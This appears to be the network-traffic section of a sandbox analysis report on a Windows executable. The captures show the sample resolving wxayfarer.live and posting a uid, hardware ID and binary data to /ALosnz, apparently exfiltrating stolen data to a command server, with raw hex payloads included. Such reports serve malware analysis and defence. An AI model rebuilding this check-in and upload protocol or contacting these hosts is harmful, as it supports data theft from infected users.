                                                Mar 25, 2025 14:59:45.946733952 CET4973080192.168.2.4176.113.115.7
                                                TimestampSource PortDest PortSource IPDest IP
                                                Mar 25, 2025 14:59:18.077423096 CET6307453192.168.2.41.1.1.1
                                                Mar 25, 2025 14:59:18.228065014 CET53630741.1.1.1192.168.2.4

                                                DNS Queries

                                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                Mar 25, 2025 14:59:18.077423096 CET192.168.2.41.1.1.10x53feStandard query (0)wxayfarer.liveA (IP address)IN (0x0001)false

                                                DNS Answers

                                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.80.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.112.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.96.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.32.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.64.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.16.1A (IP address)IN (0x0001)false
                                                Mar 25, 2025 14:59:18.228065014 CET1.1.1.1192.168.2.40x53feNo error (0)wxayfarer.live104.21.48.1A (IP address)IN (0x0001)false

                                                HTTP Request Dependency Graph

                                                • wxayfarer.live

                                                HTTPS Proxied Packets

                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                0192.168.2.449723104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:18 UTC265OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: application/x-www-form-urlencoded
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 51
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:18 UTC51OUTData Raw: 75 69 64 3d 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 26 63 69 64 3d
                                                Data Ascii: uid=40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247&cid=
                                                2025-03-25 13:59:19 UTC792INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:18 GMT
                                                Content-Type: application/octet-stream
                                                Content-Length: 33672
                                                Connection: close
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=jN7iDt07%2BZztTfTlrtV%2FSmGwKqZVqFX%2FSWR4v%2F8J7TLSdCxf3sRcKOgXyBkQ3jaJMLm81TWoLdy9f%2BVwdp9nNBJ1uwgm58kXrsUxY2Hu0CUMCs6on5gTdBRLmZ8omnHmlA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eed95dc747d24-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=122818&min_rtt=118110&rtt_var=32040&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2833&recv_bytes=952&delivery_rate=28090&cwnd=227&unsent_bytes=0&cid=7d04b8e5686c4c08&ts=567&x=0"
                                                2025-03-25 13:59:19 UTC577INData Raw: 34 66 78 63 26 51 b7 b7 44 ea 5e 2d a3 36 60 6e b7 22 ed c3 a9 34 9c c6 6a 09 5e 32 52 09 52 74 68 ff c6 f7 6f 62 cc 5b 51 a4 c8 6f eb e2 a6 8b 2f 9a a1 b8 ed 7a 4f 61 d4 90 d5 5f 93 ad ad 73 5d 7d 85 f7 49 cc 2d c8 1d d9 a2 f6 3d 5c 56 71 87 25 ae b7 15 1a e7 72 55 91 76 b2 67 9e e7 c3 e1 25 df 3b db 06 2f 8e 59 d6 ec cb 26 fd 17 c3 d4 b4 2f f7 70 34 d0 51 bf 2d 33 21 2d 06 3f 5f 7b 38 8c c8 ed 2b 01 0f de 06 ff 5d a5 4d f2 9a 21 92 09 0a a5 81 e2 57 19 19 e1 fd 85 15 66 08 df 41 fe 03 c8 e6 0c 85 56 01 a9 0f 5b 85 74 d5 d3 62 bf 9e 6f fd a0 d3 36 b1 d5 97 84 92 3d 51 8b 64 4b ab 82 45 1a bf 83 21 b2 2c 60 1e 3a 11 3c e7 20 9c 90 08 f1 56 73 9c fb 69 08 0a 68 2e 2d 4e 28 31 40 3b 84 47 ff 13 97 27 1b e6 aa a1 2c f6 ff 43 17 9a 62 77 a0 6c a5 5d 27 41 a6
                                                Data Ascii: 4fxc&QD^-6`n"4j^2RRthob[Qo/zOa_s]}I-=\Vq%rUvg%;/Y&/p4Q-3!-?_{8+]M!WfAV[tbo6=QdKE!,`:< Vsih.-N(1@;G',Cbwl]'A
                                                2025-03-25 13:59:19 UTC1369INData Raw: 5f 14 bf 9a 9a b1 e5 ed ec cd 33 bb b5 90 77 3e e2 f3 02 ea 11 8c e9 85 c1 ba e1 23 fb 9a 20 ca b6 cc 26 c5 2d ca 01 ec f0 f6 19 cf c7 37 54 ba 25 e1 4d 57 11 e4 4f ec 43 a2 40 81 d7 ff fb 00 51 58 c1 16 79 96 7f e5 5e a6 3f fd 0f d5 c6 78 7b 12 d4 21 e0 6f e8 0e 32 98 b1 d8 cc b7 24 fa b0 42 e4 19 8e 16 4d b9 7c dd aa c2 ed ec aa c2 45 d8 2d 56 23 a4 a9 6c f6 63 12 92 88 ea 14 10 42 c5 96 cf 12 a2 30 29 38 15 93 88 6c af a1 d9 11 88 aa 7c d0 53 83 4b 98 ba be 00 53 ac 78 84 c6 34 ec ee 89 5f 10 8c f6 bc 59 de 29 8c cf 66 d2 90 6d 57 fd 89 d8 24 87 28 0a 6d 51 ed 8c 21 75 67 c7 b2 7a ab 98 4f 6f 98 1b 47 6d 62 19 7a 03 24 1f 0b 60 3c 7a 05 ac f8 45 a6 04 e9 33 f7 2d a4 c7 21 22 bd f3 dc a4 51 fe 62 a7 91 d4 bd 02 93 df 42 57 e8 09 02 34 cc 59 22 00 f8 e7
                                                Data Ascii: _3w># &-7T%MWOC@QXy^?x{!o2$BM|E-V#lcB0)8l|SKSx4_Y)fmW$(mQ!ugzOoGmbz$`<zE3-!"QbBW4Y"
                                                2025-03-25 13:59:19 UTC1369INData Raw: e7 1b 08 4d 76 99 a2 c0 19 bf 8b 9e 4c b1 8d 8e 4a f2 27 05 94 93 ff 84 c9 cd 23 14 bd 13 01 51 60 ad 15 ec d5 cf d1 59 e6 42 d4 bf 85 0d 1a bb d6 97 8f 7d 01 38 ba 3d d9 a4 8b 42 a2 d0 cc eb 8e cf f1 dc b7 a0 ee 93 34 a5 f0 e5 38 e9 3c b8 a2 e2 d9 7e 69 b8 19 c4 50 3f 12 f9 5d 48 c6 b1 83 e3 f0 6e ac 4f b9 2a f9 0d e9 e2 9d a6 9c 63 ca ae 94 b7 66 e9 e5 8a 87 3e 6d 1c f0 53 a1 70 5f 1b d0 54 d1 4f ff 50 5b 01 f2 a9 75 b3 88 1c b0 02 c9 a4 67 4e 84 a8 ea 94 ae 32 a0 a1 2b ae 74 50 65 b8 7a c3 45 75 2d 25 85 d0 6f dc bc 86 af 4b 70 dd 83 45 56 d8 bb 4e f2 2d 03 60 51 1e 99 d7 c1 c8 ab fb 44 c2 2b d2 48 e4 d3 c5 67 5d 42 d4 1c 28 dc 8c 11 30 76 87 eb c8 36 af ba 7f a4 80 9d 39 7b f6 85 6f 57 ca d5 ac a1 94 f2 f8 1f a8 37 df fb 91 2d 65 22 ba 84 fe 29 78 1e
                                                Data Ascii: MvLJ'#Q`YB}8=B48<~iP?]HnO*cf>mSp_TOP[ugN2+tPezEu-%oKpEVN-`QD+Hg]B(0v69{oW7-e")x
                                                2025-03-25 13:59:19 UTC1369INData Raw: d8 d3 ad 8f 83 c8 10 17 07 fe 3c 82 86 ca 11 7a eb 27 3c eb f5 df 4f 90 b8 3f ad 76 5a e3 85 e4 73 97 f8 61 a8 69 31 20 62 5a 25 f0 10 f7 2f c3 be 32 e8 01 7a a7 45 97 5f 74 3f 87 0b 16 67 a0 7f ce 43 91 e5 99 09 2b 0c 93 b0 11 64 68 a8 17 a0 6b 29 dc 65 0c ac 46 7e ae 53 56 e5 76 5c c1 b0 4b bf 01 01 7a 74 c0 c8 6b 65 e6 68 97 38 69 52 65 6b 36 34 1e 7f 8b dc ee 5d af b9 27 33 b9 f6 a7 8e ca 30 99 a3 fb 31 74 05 99 41 f0 7f 49 d0 d4 b5 42 75 a7 1c 6c 75 d4 38 49 5d 63 e1 78 ff e8 05 0a 2e 33 70 bc 81 52 d5 14 18 57 35 df 55 0a 27 71 b2 dc e7 60 24 c3 5c 34 f6 88 bc fb 61 e6 bd 5d 05 93 e6 2a 8a db d2 64 5e ac 1d 9e f4 5f 57 9b 44 5d b8 e2 6e e8 67 78 3c 07 ed a5 46 0d 2b 92 68 e2 a1 55 13 b7 11 cf 9a 53 d0 7b e5 28 04 c5 9a 93 05 82 87 3d a7 f4 08 0f 20
                                                Data Ascii: <z'<O?vZsai1 bZ%/2zE_t?gC+dhk)eF~SVv\Kztkeh8iRek64]'301tAIBulu8I]cx.3pRW5U'q`$\4a]*d^_WD]ngx<F+hUS{(=
                                                2025-03-25 13:59:19 UTC1369INData Raw: c1 88 26 fa 8e 86 09 a5 83 4e 58 d9 79 b2 be bf 06 b7 e1 d2 0f db f4 75 77 85 66 cf 3b 3e 87 13 e8 04 a2 63 25 50 98 36 92 6b 89 12 6b c2 6d 1a 38 4f 44 4c 3f d8 4c a2 b8 ae 7a 38 6a 2c 06 9a 95 3d 9f 7d 72 f9 19 26 de d4 20 be ac 61 e5 de d4 03 4a 80 98 fa 1f e5 dd e8 52 be fe d0 2a 20 d3 5b 65 18 cd 32 75 9b 22 ad a3 8f cb 13 14 9a ea b0 54 8b 90 46 de 8a fd 2f 0d 8b 2d 01 46 62 76 c1 d7 ce 75 77 24 45 de 17 d1 43 fb 20 92 b6 95 4a d7 25 64 a8 ac e3 12 e1 d4 89 dc 68 55 de 76 cf 48 9c 3e e2 62 02 29 48 60 28 ea db 7c a6 46 f2 54 9f 66 67 09 68 8a b9 92 0d 07 6a 26 38 f4 f2 16 82 18 ed bb 68 70 c0 9d 15 f9 d2 0a 92 ca 6d 92 cb a7 d1 e2 45 9e 5a 72 46 d6 e2 78 6c fe 6e 7d 13 66 8f eb 2b 11 91 90 4c 2d ce 55 47 9f 57 a6 ae d1 ca b5 ae 77 b2 f9 6e 71 f4 1a
                                                Data Ascii: &NXyuwf;>c%P6kkm8ODL?Lz8j,=}r& aJR* [e2u"TF/-Fbvuw$EC J%dhUvH>b)H`(|FTfghj&8hpmEZrFxln}f+L-UGWwnq
                                                2025-03-25 13:59:19 UTC1369INData Raw: df 49 e7 c2 b7 2c 25 bf 80 b1 16 d6 b1 dd 0d 95 7b 1b ce 98 32 08 73 c2 20 bc 8d 08 0d 69 f0 2c 0f dc d2 26 11 ed cd be fb d3 1b c9 bf c2 c1 d4 24 f7 4b b8 8c 52 6a 24 e2 e4 ce 17 64 3d 9e 6d c1 e4 5c 5a 8f 50 d0 71 74 b6 f8 cc ae e1 75 13 87 3d 54 e2 c2 6c 2b b3 cf e8 56 25 66 d1 29 a7 2d 72 ad f8 54 c3 c8 98 a8 8c ae 80 d6 42 09 1f c3 20 50 ba 03 63 c5 a4 2d 51 7a 57 f6 c5 db a1 ff 56 2f 49 b5 39 43 4a c5 25 73 bf 4e f6 d0 3d f3 3c 8a a5 c7 ae d9 3e d2 a4 a1 91 40 5f 44 4b 9c 11 74 9a fb 78 d5 26 4d 25 61 58 23 b4 2a cd 00 a4 4c 34 51 04 a0 f4 38 07 67 2b fb 68 9b 52 52 e5 1c 3d 6e fd 3d 16 30 cf f9 af 0e e0 60 33 01 d2 8e 1b 88 32 8d 51 04 d9 d5 75 21 11 9b 5e e5 dd ce 69 ac f8 bd 67 4d 3f a2 3e e5 0c c4 c0 16 aa 6e 53 bd 12 f4 3c bb 2b bf 45 42 aa be
                                                Data Ascii: I,%{2s i,&$KRj$d=m\ZPqtu=Tl+V%f)-rTB Pc-QzWV/I9CJ%sN=<>@_DKtx&M%aX#*L4Q8g+hRR=n=0`32Qu!^igM?>nS<+EB
                                                2025-03-25 13:59:19 UTC1369INData Raw: d3 ff ae ee d0 4e 29 cb 77 1b 48 4b 2f c7 8c 4f ef db 50 72 c8 29 23 4b a6 b0 98 18 22 30 ff 3c f0 e7 65 b1 c2 a4 42 d3 b1 25 e0 2f a0 34 80 12 7d db 87 39 c2 81 52 eb 04 de 9a b6 0a 69 94 3d 55 d1 fc 40 66 d6 14 36 72 c8 dd 3f 65 75 c3 4b e8 d4 11 96 1d b7 07 a9 c4 8e c8 64 63 22 de a6 be a1 55 1a c2 0d 36 8f 07 c3 45 e9 5d 0a 6b e1 8a ed a2 75 12 ff 48 91 ee 27 9d 46 8a c8 16 8a 95 f0 fd f8 02 a4 8e c2 1e 67 18 9a 9d bb d7 db d6 7e f9 35 08 cf 39 3e 83 a2 aa 52 06 72 8a df f2 b5 47 9b 47 f1 79 3b 72 e0 47 ce 74 1c eb 45 3f 9d 9b 61 40 ae c4 35 ec 18 97 a2 bf 2f 5c 9c 3e 35 7d 27 c9 8b d8 d1 30 1e af f4 9b 6e a0 97 1d cf 1b 13 c6 5f 77 69 74 f8 86 14 7e 88 58 dd 6a b4 ad 05 23 15 d5 25 8c 1c a2 5b d8 b2 3c 93 b0 11 0d b5 46 e5 21 06 7b 43 0d b5 09 39 35
                                                Data Ascii: N)wHK/OPr)#K"0<eB%/4}9Ri=U@f6r?euKdc"U6E]kuH'Fg~59>RrGGy;rGtE?a@5/\>5}'0n_wit~Xj#%[<F!{C95
                                                2025-03-25 13:59:19 UTC1369INData Raw: 23 e0 8f a5 59 d7 71 1c aa 70 e1 ad 77 cf d7 40 d7 cc a8 bd aa 8f 8f fd 9a e1 d7 fe 50 a4 64 7b 87 b8 50 c0 c7 a9 e0 01 0b 98 21 41 eb 9e 08 b7 67 e7 d0 23 46 de cd b2 f0 fe 0f a6 d6 db cd 25 aa 05 65 87 4a 43 08 c1 18 e1 63 fa 7c 3a 8c e0 8f 2d af 9d d9 cb d7 6c 33 fa 7b 1c 4c 3a c2 88 27 64 b4 ca bd 57 01 87 99 9e da ec e5 90 e6 74 a6 ad 68 21 e6 a1 aa 01 47 51 34 ca cd c1 8c bf 08 48 6f 83 55 b7 c8 7a 82 88 03 ac 75 10 cf e6 70 cc 14 28 a2 63 35 13 1a a9 b9 59 f2 cc 65 de c4 11 f2 3d 05 92 ae 65 9b 0d ca 02 52 2c 2c 0d 41 39 8c a2 d4 32 5e 76 37 13 5e e1 81 3a ff bb 1b fc 78 7a 26 9c c7 5c 8e 12 34 13 b2 a0 82 2f 21 0d 2f 4c d8 14 dd 06 a2 d6 31 5a fb 45 5c 71 0a 4e 05 2c 56 ca f5 4d 00 73 d3 d9 6f 9f f4 a0 f5 a6 60 af 5a d6 55 17 06 10 8f 34 e8 58 e6
                                                Data Ascii: #Yqpw@Pd{P!Ag#F%eJCc|:-l3{L:'dWth!GQ4HoUzup(c5Ye=eR,,A92^v7^:xz&\4/!/L1ZE\qN,VMso`ZU4X
                                                2025-03-25 13:59:19 UTC1369INData Raw: 98 ae 73 d6 ee 64 11 5b 89 3b 75 1a 6c 6c 66 24 ac b5 5f 12 cb d8 f0 a1 53 3c 09 32 b4 94 95 31 82 b6 35 e5 c1 61 34 d0 96 75 b2 e6 76 a3 76 d3 d9 f4 43 66 08 60 4c d8 18 96 0a 9e df 43 ca 5d b1 3c fe 19 c5 06 40 a2 c6 66 02 f3 c3 b7 95 32 d9 4f c5 77 4a 78 2c d0 95 d9 0b c7 23 08 0b ac 42 64 36 6d 81 16 ac c0 6d 2a 41 45 78 5f c4 1a 39 69 5a 70 aa c1 48 be ba 31 bb f6 3e 81 d6 ca 29 74 78 31 b6 63 e1 72 9d a8 77 99 c5 92 ea 8d eb f7 df 04 00 02 27 b4 25 3b 1f f9 5e 51 95 9b 64 36 74 69 b1 f9 c8 ea 37 b5 c5 11 16 44 d9 73 24 5b 3f e8 45 e3 b6 b1 03 04 64 e5 ae e2 9d 67 00 27 0e e5 7d c7 14 2f eb e4 14 31 00 44 93 d0 b4 88 83 9a 86 26 0c e7 60 ec 98 4c d7 de 1e 16 d8 0a b0 0d 33 92 86 d3 13 08 22 18 ac 9e 09 26 26 7f f0 a7 0a 61 3b 4c 22 bc e7 be 7d 68 c1
                                                Data Ascii: sd[;ullf$_S<215a4uvvCf`LC]<@f2OwJx,#Bd6mm*AEx_9iZpH1>)tx1crw'%;^Qd6ti7Ds$[?Edg'}/1D&`L3"&&a;L"}h


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                1192.168.2.449724104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:21 UTC273OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=9zdQGWOY
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 19571
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:21 UTC15331OUTData Raw: 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 39 7a 64 51 47 57 4f 59 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42 37 33 38 30 31 35 45 33 30 45 35 45 34 35 38 39 39 0d
                                                Data Ascii: --9zdQGWOYContent-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--9zdQGWOYContent-Disposition: form-data; name="pid"2--9zdQGWOYContent-Disposition: form-data; name="hwid"CAD350E94A39DFB738015E30E5E45899
                                                2025-03-25 13:59:21 UTC4240OUTData Raw: 23 e7 6c 67 38 b8 1c bd 2c e5 bf 77 50 ea b7 1d 82 1e d6 48 45 56 23 c1 81 c4 33 f6 ba a9 80 87 5c 37 6b db 04 0e 61 ef 5d ae 13 c2 6a 3b 78 d0 cb de 40 6f 59 5c 1c c8 94 2f 3b d5 01 35 53 6a f4 57 b3 8d 74 b4 60 44 5a f6 70 f3 2c c3 7d 3e 37 39 c0 24 bf 0e 5c c1 c5 0c 85 10 30 7e ea b9 1c 98 f7 2e f6 76 9f 40 76 01 90 95 02 be 8a d0 78 a8 59 d7 85 e8 8c be fe 36 ce 8e ae 72 df 33 d5 eb e1 5f c6 e6 6c 0f 8e dc d7 ad 40 7c 58 c3 11 39 34 b0 71 11 46 7d 95 cd f7 79 dd df 26 d7 52 44 3f a1 28 78 21 a7 14 94 b9 7f 25 e6 77 13 69 ec 20 c8 6a d8 f2 c5 d0 44 41 c1 19 2d 30 51 39 3e f0 0a 4b 10 d0 c6 ca 8b b3 f1 3e 4d bd 30 3b df 5c e7 f1 8e 96 1f bc 0e ec e5 54 a1 b6 de d8 f6 44 4b 9f 52 5f 83 92 7d 35 9b 84 50 9a 31 ef 4e 74 8e fa cf 01 ad d1 41 46 36 cb 2f 8b
                                                Data Ascii: #lg8,wPHEV#3\7ka]j;x@oY\/;5SjWt`DZp,}>79$\0~.v@vxY6r3_l@|X94qF}y&RD?(x!%wi jDA-0Q9>K>M0;\TDKR_}5P1NtAF6/
                                                2025-03-25 13:59:21 UTC814INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:21 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RYwJMf8Rf33FUu6kwIda3WVrtF7CA18GO0R%2Fn%2Bw5F9WawFF2vbg9ctqJ2Ef%2FkHzrmG4bNzZepJJa1cjmauPQh6PGswP4F3p%2Fv5cKnME7BS6bW67sLZLyfZNiva5uiWIcA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eeda54d911b58-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=106339&min_rtt=103016&rtt_var=24972&sent=17&recv=24&lost=0&retrans=0&sent_bytes=2831&recv_bytes=20524&delivery_rate=36002&cwnd=228&unsent_bytes=0&cid=c9e4d3c012b94240&ts=566&x=0"
                                                2025-03-25 13:59:21 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d 7d 0d 0a
                                                Data Ascii: 44{"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:21 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                2192.168.2.449725104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:23 UTC273OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=Mb46dE8tQ
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 8733
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:23 UTC8733OUTData Raw: 2d 2d 4d 62 34 36 64 45 38 74 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 4d 62 34 36 64 45 38 74 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 4d 62 34 36 64 45 38 74 51 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42 37 33 38 30 31 35 45 33 30 45 35 45 34 35 38
                                                Data Ascii: --Mb46dE8tQContent-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--Mb46dE8tQContent-Disposition: form-data; name="pid"2--Mb46dE8tQContent-Disposition: form-data; name="hwid"CAD350E94A39DFB738015E30E5E458
                                                2025-03-25 13:59:23 UTC818INHTTP/1.1 200 OK
                                                Date: Tue, 25 Mar 2025 13:59:23 GMT
                                                Content-Type: application/json
                                                Transfer-Encoding: chunked
                                                Connection: close
                                                Vary: Accept-Encoding
                                                cf-cache-status: DYNAMIC
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=MDMouc7MeUkiAOR0gOj6W9AYwItDniosRooNGxgs6YBYMd%2FeEHNUk6t5tS%2FXjBl5VfY9Uu0wf%2F%2Bp9U0Q7sYXDC7A9%2BPTUYmeOVbXfkSYM%2BoWjhjOlvlWovGe2w8w8%2Bghhg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Server: cloudflare
                                                CF-RAY: 925eedb23cd5cb3a-EWR
                                                alt-svc: h3=":443"; ma=86400
                                                server-timing: cfL4;desc="?proto=TCP&rtt=103901&min_rtt=103686&rtt_var=22084&sent=9&recv=16&lost=0&retrans=2&sent_bytes=2832&recv_bytes=9664&delivery_rate=35927&cwnd=233&unsent_bytes=0&cid=469095302ba09a88&ts=647&x=0"
                                                2025-03-25 13:59:23 UTC74INData Raw: 34 34 0d 0a 7b 22 73 75 63 63 65 73 73 22 3a 7b 22 6d 65 73 73 61 67 65 22 3a 22 6d 65 73 73 61 67 65 20 73 75 63 63 65 73 73 20 64 65 6c 69 76 65 72 79 20 66 72 6f 6d 20 31 36 31 2e 37 37 2e 31 33 2e 32 30 22 7d 7d 0d 0a
                                                Data Ascii: 44{"success":{"message":"message success delivery from 161.77.13.20"}}
                                                2025-03-25 13:59:23 UTC5INData Raw: 30 0d 0a 0d 0a
                                                Data Ascii: 0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                3192.168.2.449726104.21.80.14437588C:\Users\user\Desktop\ASIr1Bo2x9.exe
                                                TimestampBytes transferredDirectionData
                                                2025-03-25 13:59:24 UTC279OUTPOST /ALosnz HTTP/1.1
                                                Connection: Keep-Alive
                                                Content-Type: multipart/form-data; boundary=QzbfvKAlxzljv2
                                                User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/109.0.0.0 Safari/537.36
                                                Content-Length: 20411
                                                Host: wxayfarer.live
                                                2025-03-25 13:59:24 UTC15331OUTData Raw: 2d 2d 51 7a 62 66 76 4b 41 6c 78 7a 6c 6a 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 75 69 64 22 0d 0a 0d 0a 34 30 63 30 34 63 65 65 37 63 39 38 36 30 39 64 35 64 33 30 63 66 30 30 62 38 65 64 35 66 34 35 31 62 66 62 64 64 36 32 34 37 0d 0a 2d 2d 51 7a 62 66 76 4b 41 6c 78 7a 6c 6a 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 51 7a 62 66 76 4b 41 6c 78 7a 6c 6a 76 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 43 41 44 33 35 30 45 39 34 41 33 39 44 46 42
                                                Data Ascii: --QzbfvKAlxzljv2Content-Disposition: form-data; name="uid"40c04cee7c98609d5d30cf00b8ed5f451bfbdd6247--QzbfvKAlxzljv2Content-Disposition: form-data; name="pid"3--QzbfvKAlxzljv2Content-Disposition: form-data; name="hwid"CAD350E94A39DFB
